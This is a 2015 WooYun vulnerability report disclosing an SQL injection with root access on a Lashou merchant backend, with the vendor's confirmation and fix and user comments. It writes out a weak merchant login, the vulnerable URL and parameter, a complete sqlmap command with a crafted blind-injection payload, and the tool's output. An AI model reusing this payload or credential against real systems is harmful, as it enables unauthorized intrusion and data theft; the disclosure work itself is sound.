当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0123577

漏洞标题:拉手网某重要站点SQL注射_ROOT权限

相关厂商:拉手网

漏洞作者: Jannock

提交时间:2015-06-29 22:54

修复时间:2015-07-09 11:29

公开时间:2015-07-09 11:29

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经修复

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-06-29: 细节已通知厂商并且等待厂商处理中
2015-06-30: 厂商已经确认,细节仅向厂商公开
2015-07-09: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

拉手网某重要站点SQL注射_ROOT权限,全库信息。

详细说明:

首先看到 WooYun: 拉手网商家后台设计不当可探测大量弱口令账号(影响商家结账与提现敏感信息)
随便登陆了一个,这里是 fengzhen 123456
然后转到cg.lashou.com 后台也是随便找到一处SQL注入
估计有多处,请自行检测。
http://cg.lashou.com/new_index.php?class=Stat&goods_id=10121973&fd_id=39355
fd_id 存在SQL注入
注入数据中包含商家的全库信息。

漏洞证明:

python sqlmap.py -r 1.txt -p fd_id --dbms=mysql --technique=B --prefix "39355 and 1=if((1=1" --suffix "),1,(select 1 union select 2))" --threads 5 --dbs
         _
 ___ ___| |_____ ___ ___  {1.0-dev-nongit-20150629}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
 consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 22:45:22
1.txt
[22:45:22] [INFO] parsing HTTP request from '1.txt'
1.txt
[22:45:22] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Parameter: fd_id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: class=Stat&goods_id=10121973&fd_id=39355 and 1=if((1=1 AND 4480=448
0),1,(select 1 union select 2))
---


available databases [16]:
[*] ho***********
[*] hu***********
[*] in***********
[*] la***********
[*] la***********
[*] la***********
[*] la***********
[*] la***********
[*] la***********
[*] lo***********
[*] my***********
[*] my***********
[*] pe***********
[*] st***********
[*] te***********
[*] th***********

1.png

修复方案:

过滤

版权声明:转载请注明来源 Jannock@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:18

确认时间:2015-06-30 09:34

厂商回复:

谢谢您的报告.我们已经将问题告知研发,现已讨论处理中.希望你持续关注.万福.

最新状态:

2015-07-09:已经修复完成.谢谢.

漏洞评价:

评论

  1. 2015-06-29 22:57 | 子非海绵宝宝 认证白帽子 ( 核心白帽子 | Rank:1044 漏洞数:106 | 发扬海绵宝宝的精神!你不是海绵宝宝,你怎...)

    难道是沙发?

  2. 2015-06-29 23:00 | hh2014 ( 普通白帽子 | Rank:225 漏洞数:39 | 继续)

    一哥这么晚了还刷

  3. 2015-06-29 23:06 | qhwlpg ( 普通白帽子 | Rank:226 漏洞数:54 | 潜心代码审计。)

    刷刷刷

  4. 2015-06-29 23:44 | 李旭敏 ( 普通白帽子 | Rank:469 漏洞数:71 | ฏ๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎...)

    一哥又复活了

  5. 2015-06-29 23:45 | 李旭敏 ( 普通白帽子 | Rank:469 漏洞数:71 | ฏ๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎...)

    一哥又满血复活了

  6. 2015-06-30 01:04 | zzR 认证白帽子 ( 核心白帽子 | Rank:1382 漏洞数:122 | 收wb 1:5 无限量收 [平台担保])

    全库 root !!

  7. 2015-06-30 09:10 | 牛 小 帅 ( 普通白帽子 | Rank:363 漏洞数:84 | [code]心若没有栖息的地方,走到哪里都是在...)

    @xsser 怎么论坛登入不了啦?

  8. 2015-06-30 09:35 | 浩天 认证白帽子 ( 普通白帽子 | Rank:915 漏洞数:79 | 度假中...)

    希望你持续关注

  9. 2015-06-30 09:45 | 牛 小 帅 ( 普通白帽子 | Rank:363 漏洞数:84 | [code]心若没有栖息的地方,走到哪里都是在...)

    @浩天 怎么论坛进不去了 一直提示密码错误

  10. 2015-06-30 16:05 | 泡泡堂 ( 路人 | Rank:6 漏洞数:2 | 希望在wooyun这个平台好好学习)

    我是第666个关注一哥的人